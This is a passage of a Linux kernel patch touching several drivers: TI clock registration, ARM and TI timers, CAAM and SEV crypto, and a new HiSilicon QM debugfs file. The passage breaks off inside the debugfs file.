+--- a/drivers/clk/ti/clk.c
++++ b/drivers/clk/ti/clk.c
+@@ -475,7 +475,7 @@ void __init ti_clk_add_aliases(void)
+ 		clkspec.np = np;
+ 		clk = of_clk_get_from_provider(&clkspec);
+ 
+-		ti_clk_add_alias(NULL, clk, ti_dt_clk_name(np));
++		ti_clk_add_alias(clk, ti_dt_clk_name(np));
+ 	}
+ }
+ 
+@@ -528,7 +528,6 @@ void omap2_clk_enable_init_clocks(const char **clk_names, u8 num_clocks)
+ 
+ /**
+  * ti_clk_add_alias - add a clock alias for a TI clock
+- * @dev: device alias for this clock
+  * @clk: clock handle to create alias for
+  * @con: connection ID for this clock
+  *
+@@ -536,7 +535,7 @@ void omap2_clk_enable_init_clocks(const char **clk_names, u8 num_clocks)
+  * and assigns the data to it. Returns 0 if successful, negative error
+  * value otherwise.
+  */
+-int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
++int ti_clk_add_alias(struct clk *clk, const char *con)
+ {
+ 	struct clk_lookup *cl;
+ 
+@@ -550,8 +549,6 @@ int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
+ 	if (!cl)
+ 		return -ENOMEM;
+ 
+-	if (dev)
+-		cl->dev_id = dev_name(dev);
+ 	cl->con_id = con;
+ 	cl->clk = clk;
+ 
+@@ -561,8 +558,8 @@ int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
+ }
+ 
+ /**
+- * ti_clk_register - register a TI clock to the common clock framework
+- * @dev: device for this clock
++ * of_ti_clk_register - register a TI clock to the common clock framework
++ * @node: device node for this clock
+  * @hw: hardware clock handle
+  * @con: connection ID for this clock
+  *
+@@ -570,17 +567,18 @@ int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con)
+  * alias for it. Returns a handle to the registered clock if successful,
+  * ERR_PTR value in failure.
+  */
+-struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+-			    const char *con)
++struct clk *of_ti_clk_register(struct device_node *node, struct clk_hw *hw,
++			       const char *con)
+ {
+ 	struct clk *clk;
+ 	int ret;
+ 
+-	clk = clk_register(dev, hw);
+-	if (IS_ERR(clk))
+-		return clk;
++	ret = of_clk_hw_register(node, hw);
++	if (ret)
++		return ERR_PTR(ret);
+ 
+-	ret = ti_clk_add_alias(dev, clk, con);
++	clk = hw->clk;
++	ret = ti_clk_add_alias(clk, con);
+ 	if (ret) {
+ 		clk_unregister(clk);
+ 		return ERR_PTR(ret);
+@@ -590,8 +588,8 @@ struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+ }
+ 
+ /**
+- * ti_clk_register_omap_hw - register a clk_hw_omap to the clock framework
+- * @dev: device for this clock
++ * of_ti_clk_register_omap_hw - register a clk_hw_omap to the clock framework
++ * @node: device node for this clock
+  * @hw: hardware clock handle
+  * @con: connection ID for this clock
+  *
+@@ -600,13 +598,13 @@ struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+  * Returns a handle to the registered clock if successful, ERR_PTR value
+  * in failure.
+  */
+-struct clk *ti_clk_register_omap_hw(struct device *dev, struct clk_hw *hw,
+-				    const char *con)
++struct clk *of_ti_clk_register_omap_hw(struct device_node *node,
++				       struct clk_hw *hw, const char *con)
+ {
+ 	struct clk *clk;
+ 	struct clk_hw_omap *oclk;
+ 
+-	clk = ti_clk_register(dev, hw, con);
++	clk = of_ti_clk_register(node, hw, con);
+ 	if (IS_ERR(clk))
+ 		return clk;
+ 
+diff --git a/drivers/clk/ti/clkctrl.c b/drivers/clk/ti/clkctrl.c
+index 57611bfb299c1..87e5624789ef6 100644
+--- a/drivers/clk/ti/clkctrl.c
++++ b/drivers/clk/ti/clkctrl.c
+@@ -308,7 +308,7 @@ _ti_clkctrl_clk_register(struct omap_clkctrl_provider *provider,
+ 	init.ops = ops;
+ 	init.flags = 0;
+ 
+-	clk = ti_clk_register(NULL, clk_hw, init.name);
++	clk = of_ti_clk_register(node, clk_hw, init.name);
+ 	if (IS_ERR_OR_NULL(clk)) {
+ 		ret = -EINVAL;
+ 		goto cleanup;
+@@ -689,7 +689,7 @@ clkdm_found:
+ 		init.ops = &omap4_clkctrl_clk_ops;
+ 		hw->hw.init = &init;
+ 
+-		clk = ti_clk_register_omap_hw(NULL, &hw->hw, init.name);
++		clk = of_ti_clk_register_omap_hw(node, &hw->hw, init.name);
+ 		if (IS_ERR_OR_NULL(clk))
+ 			goto cleanup;
+ 
+diff --git a/drivers/clk/ti/clock.h b/drivers/clk/ti/clock.h
+index 37ab53339a9be..16a9f7c2280a5 100644
+--- a/drivers/clk/ti/clock.h
++++ b/drivers/clk/ti/clock.h
+@@ -199,12 +199,12 @@ extern const struct omap_clkctrl_data dm816_clkctrl_data[];
+ 
+ typedef void (*ti_of_clk_init_cb_t)(void *, struct device_node *);
+ 
+-struct clk *ti_clk_register(struct device *dev, struct clk_hw *hw,
+-			    const char *con);
+-struct clk *ti_clk_register_omap_hw(struct device *dev, struct clk_hw *hw,
+-				    const char *con);
++struct clk *of_ti_clk_register(struct device_node *node, struct clk_hw *hw,
++			       const char *con);
++struct clk *of_ti_clk_register_omap_hw(struct device_node *node,
++				       struct clk_hw *hw, const char *con);
+ const char *ti_dt_clk_name(struct device_node *np);
+-int ti_clk_add_alias(struct device *dev, struct clk *clk, const char *con);
++int ti_clk_add_alias(struct clk *clk, const char *con);
+ void ti_clk_add_aliases(void);
+ 
+ void ti_clk_latch(struct clk_omap_reg *reg, s8 shift);
+diff --git a/drivers/clk/ti/composite.c b/drivers/clk/ti/composite.c
+index 77b771dd050a9..b85382c370f7e 100644
+--- a/drivers/clk/ti/composite.c
++++ b/drivers/clk/ti/composite.c
+@@ -176,7 +176,7 @@ static void __init _register_composite(void *user,
+ 				     &ti_composite_gate_ops, 0);
+ 
+ 	if (!IS_ERR(clk)) {
+-		ret = ti_clk_add_alias(NULL, clk, name);
++		ret = ti_clk_add_alias(clk, name);
+ 		if (ret) {
+ 			clk_unregister(clk);
+ 			goto cleanup;
+diff --git a/drivers/clk/ti/divider.c b/drivers/clk/ti/divider.c
+index 488d3da60c317..5d5bb123ba949 100644
+--- a/drivers/clk/ti/divider.c
++++ b/drivers/clk/ti/divider.c
+@@ -309,7 +309,6 @@ static struct clk *_register_divider(struct device_node *node,
+ 				     u32 flags,
+ 				     struct clk_omap_divider *div)
+ {
+-	struct clk *clk;
+ 	struct clk_init_data init;
+ 	const char *parent_name;
+ 	const char *name;
+@@ -326,12 +325,7 @@ static struct clk *_register_divider(struct device_node *node,
+ 	div->hw.init = &init;
+ 
+ 	/* register the clock */
+-	clk = ti_clk_register(NULL, &div->hw, name);
+-
+-	if (IS_ERR(clk))
+-		kfree(div);
+-
+-	return clk;
++	return of_ti_clk_register(node, &div->hw, name);
+ }
+ 
+ int ti_clk_parse_divider_data(int *div_table, int num_dividers, int max_div,
+diff --git a/drivers/clk/ti/dpll.c b/drivers/clk/ti/dpll.c
+index 8ed43bc6b7cc8..403ec81f561b6 100644
+--- a/drivers/clk/ti/dpll.c
++++ b/drivers/clk/ti/dpll.c
+@@ -187,7 +187,7 @@ static void __init _register_dpll(void *user,
+ 
+ 	/* register the clock */
+ 	name = ti_dt_clk_name(node);
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+@@ -259,7 +259,7 @@ static void _register_dpll_x2(struct device_node *node,
+ #endif
+ 
+ 	/* register the clock */
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(clk_hw);
+diff --git a/drivers/clk/ti/fixed-factor.c b/drivers/clk/ti/fixed-factor.c
+index c80cee0f5d3d7..c102c53201686 100644
+--- a/drivers/clk/ti/fixed-factor.c
++++ b/drivers/clk/ti/fixed-factor.c
+@@ -54,7 +54,7 @@ static void __init of_ti_fixed_factor_clk_setup(struct device_node *node)
+ 	if (!IS_ERR(clk)) {
+ 		of_clk_add_provider(node, of_clk_src_simple_get, clk);
+ 		of_ti_clk_autoidle_setup(node);
+-		ti_clk_add_alias(NULL, clk, clk_name);
++		ti_clk_add_alias(clk, clk_name);
+ 	}
+ }
+ CLK_OF_DECLARE(ti_fixed_factor_clk, "ti,fixed-factor-clock",
+diff --git a/drivers/clk/ti/gate.c b/drivers/clk/ti/gate.c
+index 307702921431d..8e477d50d0fdb 100644
+--- a/drivers/clk/ti/gate.c
++++ b/drivers/clk/ti/gate.c
+@@ -85,7 +85,7 @@ static int omap36xx_gate_clk_enable_with_hsdiv_restore(struct clk_hw *hw)
+ 	return ret;
+ }
+ 
+-static struct clk *_register_gate(struct device *dev, const char *name,
++static struct clk *_register_gate(struct device_node *node, const char *name,
+ 				  const char *parent_name, unsigned long flags,
+ 				  struct clk_omap_reg *reg, u8 bit_idx,
+ 				  u8 clk_gate_flags, const struct clk_ops *ops,
+@@ -115,7 +115,7 @@ static struct clk *_register_gate(struct device *dev, const char *name,
+ 
+ 	init.flags = flags;
+ 
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(clk_hw);
+@@ -158,7 +158,7 @@ static void __init _of_ti_gate_clk_setup(struct device_node *node,
+ 		clk_gate_flags |= INVERT_ENABLE;
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = _register_gate(NULL, name, parent_name, flags, &reg,
++	clk = _register_gate(node, name, parent_name, flags, &reg,
+ 			     enable_bit, clk_gate_flags, ops, hw_ops);
+ 
+ 	if (!IS_ERR(clk))
+diff --git a/drivers/clk/ti/interface.c b/drivers/clk/ti/interface.c
+index f47beeea211e8..172301c646f85 100644
+--- a/drivers/clk/ti/interface.c
++++ b/drivers/clk/ti/interface.c
+@@ -24,7 +24,8 @@ static const struct clk_ops ti_interface_clk_ops = {
+ 	.is_enabled	= &omap2_dflt_clk_is_enabled,
+ };
+ 
+-static struct clk *_register_interface(struct device *dev, const char *name,
++static struct clk *_register_interface(struct device_node *node,
++				       const char *name,
+ 				       const char *parent_name,
+ 				       struct clk_omap_reg *reg, u8 bit_idx,
+ 				       const struct clk_hw_omap_ops *ops)
+@@ -49,7 +50,7 @@ static struct clk *_register_interface(struct device *dev, const char *name,
+ 	init.num_parents = 1;
+ 	init.parent_names = &parent_name;
+ 
+-	clk = ti_clk_register_omap_hw(NULL, &clk_hw->hw, name);
++	clk = of_ti_clk_register_omap_hw(node, &clk_hw->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(clk_hw);
+@@ -80,7 +81,7 @@ static void __init _of_ti_interface_clk_setup(struct device_node *node,
+ 	}
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = _register_interface(NULL, name, parent_name, &reg,
++	clk = _register_interface(node, name, parent_name, &reg,
+ 				  enable_bit, ops);
+ 
+ 	if (!IS_ERR(clk))
+diff --git a/drivers/clk/ti/mux.c b/drivers/clk/ti/mux.c
+index 46b45b3e8319a..1ebafa386be61 100644
+--- a/drivers/clk/ti/mux.c
++++ b/drivers/clk/ti/mux.c
+@@ -118,7 +118,7 @@ const struct clk_ops ti_clk_mux_ops = {
+ 	.restore_context = clk_mux_restore_context,
+ };
+ 
+-static struct clk *_register_mux(struct device *dev, const char *name,
++static struct clk *_register_mux(struct device_node *node, const char *name,
+ 				 const char * const *parent_names,
+ 				 u8 num_parents, unsigned long flags,
+ 				 struct clk_omap_reg *reg, u8 shift, u32 mask,
+@@ -148,7 +148,7 @@ static struct clk *_register_mux(struct device *dev, const char *name,
+ 	mux->table = table;
+ 	mux->hw.init = &init;
+ 
+-	clk = ti_clk_register(dev, &mux->hw, name);
++	clk = of_ti_clk_register(node, &mux->hw, name);
+ 
+ 	if (IS_ERR(clk))
+ 		kfree(mux);
+@@ -207,7 +207,7 @@ static void of_mux_clk_setup(struct device_node *node)
+ 	mask = (1 << fls(mask)) - 1;
+ 
+ 	name = ti_dt_clk_name(node);
+-	clk = _register_mux(NULL, name, parent_names, num_parents,
++	clk = _register_mux(node, name, parent_names, num_parents,
+ 			    flags, &reg, shift, mask, latch, clk_mux_flags,
+ 			    NULL);
+ 
+diff --git a/drivers/clocksource/arm_arch_timer.c b/drivers/clocksource/arm_arch_timer.c
+index 239c70ac120e8..fee1c4bf10214 100644
+--- a/drivers/clocksource/arm_arch_timer.c
++++ b/drivers/clocksource/arm_arch_timer.c
+@@ -817,8 +817,9 @@ static u64 __arch_timer_check_delta(void)
+ 		 * Note that TVAL is signed, thus has only 31 of its
+ 		 * 32 bits to express magnitude.
+ 		 */
+-		MIDR_ALL_VERSIONS(MIDR_CPU_MODEL(ARM_CPU_IMP_APM,
+-						 APM_CPU_PART_POTENZA)),
++		MIDR_REV_RANGE(MIDR_CPU_MODEL(ARM_CPU_IMP_APM,
++					      APM_CPU_PART_XGENE),
++			       APM_CPU_VAR_POTENZA, 0x0, 0xf),
+ 		{},
+ 	};
+ 
+diff --git a/drivers/clocksource/timer-ti-dm.c b/drivers/clocksource/timer-ti-dm.c
+index 00af1a8e34fbd..ec86aecb748f1 100644
+--- a/drivers/clocksource/timer-ti-dm.c
++++ b/drivers/clocksource/timer-ti-dm.c
+@@ -141,6 +141,8 @@ struct dmtimer {
+ 	struct platform_device *pdev;
+ 	struct list_head node;
+ 	struct notifier_block nb;
++	struct notifier_block fclk_nb;
++	unsigned long fclk_rate;
+ };
+ 
+ static u32 omap_reserved_systimers;
+@@ -254,8 +256,7 @@ static inline void __omap_dm_timer_enable_posted(struct dmtimer *timer)
+ 	timer->posted = OMAP_TIMER_POSTED;
+ }
+ 
+-static inline void __omap_dm_timer_stop(struct dmtimer *timer,
+-					unsigned long rate)
++static inline void __omap_dm_timer_stop(struct dmtimer *timer)
+ {
+ 	u32 l;
+ 
+@@ -270,7 +271,7 @@ static inline void __omap_dm_timer_stop(struct dmtimer *timer,
+ 		 * Wait for functional clock period x 3.5 to make sure that
+ 		 * timer is stopped
+ 		 */
+-		udelay(3500000 / rate + 1);
++		udelay(3500000 / timer->fclk_rate + 1);
+ #endif
+ 	}
+ 
+@@ -349,6 +350,21 @@ static int omap_timer_context_notifier(struct notifier_block *nb,
+ 	return NOTIFY_OK;
+ }
+ 
++static int omap_timer_fclk_notifier(struct notifier_block *nb,
++				    unsigned long event, void *data)
++{
++	struct clk_notifier_data *clk_data = data;
++	struct dmtimer *timer = container_of(nb, struct dmtimer, fclk_nb);
++
++	switch (event) {
++	case POST_RATE_CHANGE:
++		timer->fclk_rate = clk_data->new_rate;
++		return NOTIFY_OK;
++	default:
++		return NOTIFY_DONE;
++	}
++}
++
+ static int omap_dm_timer_reset(struct dmtimer *timer)
+ {
+ 	u32 l, timeout = 100000;
+@@ -742,7 +758,6 @@ static int omap_dm_timer_stop(struct omap_dm_timer *cookie)
+ {
+ 	struct dmtimer *timer;
+ 	struct device *dev;
+-	unsigned long rate = 0;
+ 
+ 	timer = to_dmtimer(cookie);
+ 	if (unlikely(!timer))
+@@ -750,10 +765,7 @@ static int omap_dm_timer_stop(struct omap_dm_timer *cookie)
+ 
+ 	dev = &timer->pdev->dev;
+ 
+-	if (!timer->omap1)
+-		rate = clk_get_rate(timer->fclk);
+-
+-	__omap_dm_timer_stop(timer, rate);
++	__omap_dm_timer_stop(timer);
+ 
+ 	pm_runtime_put_sync(dev);
+ 
+@@ -1112,6 +1124,14 @@ static int omap_dm_timer_probe(struct platform_device *pdev)
+ 		timer->fclk = devm_clk_get(dev, "fck");
+ 		if (IS_ERR(timer->fclk))
+ 			return PTR_ERR(timer->fclk);
++
++		timer->fclk_nb.notifier_call = omap_timer_fclk_notifier;
++		ret = devm_clk_notifier_register(dev, timer->fclk,
++						 &timer->fclk_nb);
++		if (ret)
++			return ret;
++
++		timer->fclk_rate = clk_get_rate(timer->fclk);
+ 	} else {
+ 		timer->fclk = ERR_PTR(-ENODEV);
+ 	}
+diff --git a/drivers/crypto/caam/caamalg.c b/drivers/crypto/caam/caamalg.c
+index d3d8bb0a69900..e156238b4da90 100644
+--- a/drivers/crypto/caam/caamalg.c
++++ b/drivers/crypto/caam/caamalg.c
+@@ -566,7 +566,8 @@ static int chachapoly_setkey(struct crypto_aead *aead, const u8 *key,
+ 	if (keylen != CHACHA_KEY_SIZE + saltlen)
+ 		return -EINVAL;
+ 
+-	ctx->cdata.key_virt = key;
++	memcpy(ctx->key, key, keylen);
++	ctx->cdata.key_virt = ctx->key;
+ 	ctx->cdata.keylen = keylen - saltlen;
+ 
+ 	return chachapoly_set_sh_desc(aead);
+diff --git a/drivers/crypto/caam/caamalg_qi2.c b/drivers/crypto/caam/caamalg_qi2.c
+index 4482cb145d051..56058d4992cc4 100644
+--- a/drivers/crypto/caam/caamalg_qi2.c
++++ b/drivers/crypto/caam/caamalg_qi2.c
+@@ -639,7 +639,8 @@ static int chachapoly_setkey(struct crypto_aead *aead, const u8 *key,
+ 	if (keylen != CHACHA_KEY_SIZE + saltlen)
+ 		return -EINVAL;
+ 
+-	ctx->cdata.key_virt = key;
++	memcpy(ctx->key, key, keylen);
++	ctx->cdata.key_virt = ctx->key;
+ 	ctx->cdata.keylen = keylen - saltlen;
+ 
+ 	return chachapoly_set_sh_desc(aead);
+diff --git a/drivers/crypto/ccp/sev-dev.c b/drivers/crypto/ccp/sev-dev.c
+index 3e583f0324874..b8e02c3a19610 100644
+--- a/drivers/crypto/ccp/sev-dev.c
++++ b/drivers/crypto/ccp/sev-dev.c
+@@ -443,10 +443,10 @@ static int __sev_init_ex_locked(int *error)
+ 
+ static int __sev_platform_init_locked(int *error)
+ {
++	int rc = 0, psp_ret = SEV_RET_NO_FW_CALL;
+ 	struct psp_device *psp = psp_master;
+-	struct sev_device *sev;
+-	int rc = 0, psp_ret = -1;
+ 	int (*init_function)(int *error);
++	struct sev_device *sev;
+ 
+ 	if (!psp || !psp->sev_data)
+ 		return -ENODEV;
+@@ -474,9 +474,11 @@ static int __sev_platform_init_locked(int *error)
+ 		 * initialization function should succeed by replacing the state
+ 		 * with a reset state.
+ 		 */
+-		dev_err(sev->dev, "SEV: retrying INIT command because of SECURE_DATA_INVALID error. Retrying once to reset PSP SEV state.");
++		dev_err(sev->dev,
++"SEV: retrying INIT command because of SECURE_DATA_INVALID error. Retrying once to reset PSP SEV state.");
+ 		rc = init_function(&psp_ret);
+ 	}
++
+ 	if (error)
+ 		*error = psp_ret;
+ 
+diff --git a/drivers/crypto/hisilicon/Makefile b/drivers/crypto/hisilicon/Makefile
+index 1e89269a2e4b0..8595a5a5d2288 100644
+--- a/drivers/crypto/hisilicon/Makefile
++++ b/drivers/crypto/hisilicon/Makefile
+@@ -3,6 +3,6 @@ obj-$(CONFIG_CRYPTO_DEV_HISI_HPRE) += hpre/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_SEC) += sec/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_SEC2) += sec2/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_QM) += hisi_qm.o
+-hisi_qm-objs = qm.o sgl.o
++hisi_qm-objs = qm.o sgl.o debugfs.o
+ obj-$(CONFIG_CRYPTO_DEV_HISI_ZIP) += zip/
+ obj-$(CONFIG_CRYPTO_DEV_HISI_TRNG) += trng/
+diff --git a/drivers/crypto/hisilicon/debugfs.c b/drivers/crypto/hisilicon/debugfs.c
+new file mode 100644
+index 0000000000000..13bec8b2d7237
+--- /dev/null
++++ b/drivers/crypto/hisilicon/debugfs.c
+@@ -0,0 +1,1097 @@
++// SPDX-License-Identifier: GPL-2.0
++/* Copyright (c) 2022 HiSilicon Limited. */
++#include <linux/hisi_acc_qm.h>
++#include "qm_common.h"
++
++#define QM_DFX_BASE			0x0100000
++#define QM_DFX_STATE1			0x0104000
++#define QM_DFX_STATE2			0x01040C8
++#define QM_DFX_COMMON			0x0000
++#define QM_DFX_BASE_LEN			0x5A
++#define QM_DFX_STATE1_LEN		0x2E
++#define QM_DFX_STATE2_LEN		0x11
++#define QM_DFX_COMMON_LEN		0xC3
++#define QM_DFX_REGS_LEN			4UL
++#define QM_DBG_TMP_BUF_LEN		22
++#define CURRENT_FUN_MASK		GENMASK(5, 0)
++#define CURRENT_Q_MASK			GENMASK(31, 16)
++#define QM_SQE_ADDR_MASK		GENMASK(7, 0)
++
++#define QM_DFX_MB_CNT_VF		0x104010
++#define QM_DFX_DB_CNT_VF		0x104020
++#define QM_DFX_SQE_CNT_VF_SQN		0x104030
++#define QM_DFX_CQE_CNT_VF_CQN		0x104040
++#define QM_DFX_QN_SHIFT			16
++#define QM_DFX_CNT_CLR_CE		0x100118
++#define QM_DBG_WRITE_LEN		1024
++
++static const char * const qm_debug_file_name[] = {
++	[CURRENT_QM]   = "current_qm",
++	[CURRENT_Q]    = "current_q",
++	[CLEAR_ENABLE] = "clear_enable",
++};
++
++struct qm_dfx_item {
++	const char *name;
++	u32 offset;
++};
++
++static struct qm_dfx_item qm_dfx_files[] = {
++	{"err_irq", offsetof(struct qm_dfx, err_irq_cnt)},
++	{"aeq_irq", offsetof(struct qm_dfx, aeq_irq_cnt)},
++	{"abnormal_irq", offsetof(struct qm_dfx, abnormal_irq_cnt)},
++	{"create_qp_err", offsetof(struct qm_dfx, create_qp_err_cnt)},
++	{"mb_err", offsetof(struct qm_dfx, mb_err_cnt)},
++};
++
++#define CNT_CYC_REGS_NUM		10
++static const struct debugfs_reg32 qm_dfx_regs[] = {
++	/* XXX_CNT are reading clear register */
++	{"QM_ECC_1BIT_CNT               ",  0x104000ull},
++	{"QM_ECC_MBIT_CNT               ",  0x104008ull},
++	{"QM_DFX_MB_CNT                 ",  0x104018ull},
++	{"QM_DFX_DB_CNT                 ",  0x104028ull},
++	{"QM_DFX_SQE_CNT                ",  0x104038ull},
++	{"QM_DFX_CQE_CNT                ",  0x104048ull},
++	{"QM_DFX_SEND_SQE_TO_ACC_CNT    ",  0x104050ull},
++	{"QM_DFX_WB_SQE_FROM_ACC_CNT    ",  0x104058ull},
++	{"QM_DFX_ACC_FINISH_CNT         ",  0x104060ull},
++	{"QM_DFX_CQE_ERR_CNT            ",  0x1040b4ull},
++	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
++	{"QM_ECC_1BIT_INF               ",  0x104004ull},
++	{"QM_ECC_MBIT_INF               ",  0x10400cull},
++	{"QM_DFX_ACC_RDY_VLD0           ",  0x1040a0ull},
++	{"QM_DFX_ACC_RDY_VLD1           ",  0x1040a4ull},
++	{"QM_DFX_AXI_RDY_VLD            ",  0x1040a8ull},
++	{"QM_DFX_FF_ST0                 ",  0x1040c8ull},
++	{"QM_DFX_FF_ST1                 ",  0x1040ccull},
++	{"QM_DFX_FF_ST2                 ",  0x1040d0ull},
++	{"QM_DFX_FF_ST3                 ",  0x1040d4ull},
++	{"QM_DFX_FF_ST4                 ",  0x1040d8ull},
++	{"QM_DFX_FF_ST5                 ",  0x1040dcull},
++	{"QM_DFX_FF_ST6                 ",  0x1040e0ull},
++	{"QM_IN_IDLE_ST                 ",  0x1040e4ull},
++};
++
++static const struct debugfs_reg32 qm_vf_dfx_regs[] = {
++	{"QM_DFX_FUNS_ACTIVE_ST         ",  0x200ull},
++};
++
++/* define the QM's dfx regs region and region length */
++static struct dfx_diff_registers qm_diff_regs[] = {
++	{
++		.reg_offset = QM_DFX_BASE,
++		.reg_len = QM_DFX_BASE_LEN,
++	}, {
++		.reg_offset = QM_DFX_STATE1,
++		.reg_len = QM_DFX_STATE1_LEN,
++	}, {
++		.reg_offset = QM_DFX_STATE2,
++		.reg_len = QM_DFX_STATE2_LEN,
++	}, {
++		.reg_offset = QM_DFX_COMMON,
++		.reg_len = QM_DFX_COMMON_LEN,
++	},
++};
++
++static struct hisi_qm *file_to_qm(struct debugfs_file *file)
++{
++	struct qm_debug *debug = file->debug;
++
++	return container_of(debug, struct hisi_qm, debug);
++}
++
++static ssize_t qm_cmd_read(struct file *filp, char __user *buffer,
++			   size_t count, loff_t *pos)
++{
++	char buf[QM_DBG_READ_LEN];
++	int len;
++
++	len = scnprintf(buf, QM_DBG_READ_LEN, "%s\n",
++			"Please echo help to cmd to get help information");
++
++	return simple_read_from_buffer(buffer, count, pos, buf, len);
++}
++
++static void dump_show(struct hisi_qm *qm, void *info,
++		     unsigned int info_size, char *info_name)
++{
++	struct device *dev = &qm->pdev->dev;
++	u8 *info_curr = info;
++	u32 i;
++#define BYTE_PER_DW	4
++
++	dev_info(dev, "%s DUMP\n", info_name);
++	for (i = 0; i < info_size; i += BYTE_PER_DW, info_curr += BYTE_PER_DW) {
++		pr_info("DW%u: %02X%02X %02X%02X\n", i / BYTE_PER_DW,
++			*(info_curr + 3), *(info_curr + 2), *(info_curr + 1), *(info_curr));
++	}
++}
++
++static int qm_sqc_dump(struct hisi_qm *qm, const char *s)
++{
++	struct device *dev = &qm->pdev->dev;
++	struct qm_sqc *sqc, *sqc_curr;
++	dma_addr_t sqc_dma;
++	u32 qp_id;
++	int ret;
++
++	if (!s)
++		return -EINVAL;
++
++	ret = kstrtou32(s, 0, &qp_id);
++	if (ret || qp_id >= qm->qp_num) {
++		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
++		return -EINVAL;
++	}
++
++	sqc = hisi_qm_ctx_alloc(qm, sizeof(*sqc), &sqc_dma);
++	if (IS_ERR(sqc))
++		return PTR_ERR(sqc);
++
++	ret = hisi_qm_mb(qm, QM_MB_CMD_SQC, sqc_dma, qp_id, 1);
++	if (ret) {
++		down_read(&qm->qps_lock);
++		if (qm->sqc) {
++			sqc_curr = qm->sqc + qp_id;
++
++			dump_show(qm, sqc_curr, sizeof(*sqc), "SOFT SQC");
++		}
++		up_read(&qm->qps_lock);
++
++		goto free_ctx;
++	}
++
++	dump_show(qm, sqc, sizeof(*sqc), "SQC");
++
++free_ctx:
++	hisi_qm_ctx_free(qm, sizeof(*sqc), sqc, &sqc_dma);
++	return 0;
++}
++
++static int qm_cqc_dump(struct hisi_qm *qm, const char *s)
++{
++	struct device *dev = &qm->pdev->dev;
++	struct qm_cqc *cqc, *cqc_curr;
++	dma_addr_t cqc_dma;
++	u32 qp_id;
++	int ret;
++
++	if (!s)
++		return -EINVAL;
++
++	ret = kstrtou32(s, 0, &qp_id);
++	if (ret || qp_id >= qm->qp_num) {
++		dev_err(dev, "Please input qp num (0-%u)", qm->qp_num - 1);
++		return -EINVAL;
++	}
++
++	cqc = hisi_qm_ctx_alloc(qm, sizeof(*cqc), &cqc_dma);
++	if (IS_ERR(cqc))
++		return PTR_ERR(cqc);
++
++	ret = hisi_qm_mb(qm, QM_MB_CMD_CQC, cqc_dma, qp_id, 1);
++	if (ret) {
++		down_read(&qm->qps_lock);
++		if (qm->cqc) {
++			cqc_curr = qm->cqc + qp_id;
++
++			dump_show(qm, cqc_curr, sizeof(*cqc), "SOFT CQC");
++		}
++		up_read(&qm->qps_lock);
++
++		goto free_ctx;
++	}
++
++	dump_show(qm, cqc, sizeof(*cqc), "CQC");
++
++free_ctx:
++	hisi_qm_ctx_free(qm, sizeof(*cqc), cqc, &cqc_dma);
++	return 0;
++}
++
++static int qm_eqc_aeqc_dump(struct hisi_qm *qm, char *s, size_t size,
++			    int cmd, char *name)
++{
++	struct device *dev = &qm->pdev->dev;
++	dma_addr_t xeqc_dma;
++	void *xeqc;
++	int ret;
++
++	if (strsep(&s, " ")) {
++		dev_err(dev, "Please do not input extra characters!\n");
++		return -EINVAL;
++	}
++
++	xeqc = hisi_qm_ctx_alloc(qm, size, &xeqc_dma);
++	if (IS_ERR(xeqc))
++		return PTR_ERR(xeqc);
++
++	ret = hisi_qm_mb(qm, cmd, xeqc_dma, 0, 1);
++	if (ret)
++		goto err_free_ctx;
++
++	dump_show(qm, xeqc, size, name);
++
++err_free_ctx:
++	hisi_qm_ctx_free(qm, size, xeqc, &xeqc_dma);
++	return ret;
++}
++
++static int q_dump_param_parse(struct hisi_qm *qm, char *s,
++			      u32 *e_id, u32 *q_id, u16 q_depth)
++{
++	struct device *dev = &qm->pdev->dev;
++	unsigned int qp_num = qm->qp_num;
++	char *presult;
++	int ret;
++
++	presult = strsep(&s, " ");
++	if (!presult) {
++		dev_err(dev, "Please input qp number!\n");
++		return -EINVAL;
++	}
++
++	ret = kstrtou32(presult, 0, q_id);
++	if (ret || *q_id >= qp_num) {
++		dev_err(dev, "Please input qp num (0-%u)", qp_num - 1);
++		return -EINVAL;
++	}
++
++	presult = strsep(&s, " ");
++	if (!presult) {
++		dev_err(dev, "Please input sqe number!\n");
++		return -EINVAL;
++	}
++
++	ret = kstrtou32(presult, 0, e_id);
++	if (ret || *e_id >= q_depth) {
++		dev_err(dev, "Please input sqe num (0-%u)", q_depth - 1);
++		return -EINVAL;
++	}
++
++	if (strsep(&s, " ")) {
++		dev_err(dev, "Please do not input extra characters!\n");
++		return -EINVAL;
++	}
++
++	return 0;
++}
++
++static int qm_sq_dump(struct hisi_qm *qm, char *s)
++{
++	u16 sq_depth = qm->qp_array->cq_depth;
++	void *sqe, *sqe_curr;
++	struct hisi_qp *qp;
++	u32 qp_id, sqe_id;
++	int ret;
++
++	ret = q_dump_param_parse(qm, s, &sqe_id, &qp_id, sq_depth);
++	if (ret)
++		return ret;
++
++	sqe = kzalloc(qm->sqe_size * sq_depth, GFP_KERNEL);
++	if (!sqe)
++		return -ENOMEM;
++
++	qp = &qm->qp_array[qp_id];
++	memcpy(sqe, qp->sqe, qm->sqe_size * sq_depth);
++	sqe_curr = sqe + (u32)(sqe_id * qm->sqe_size);
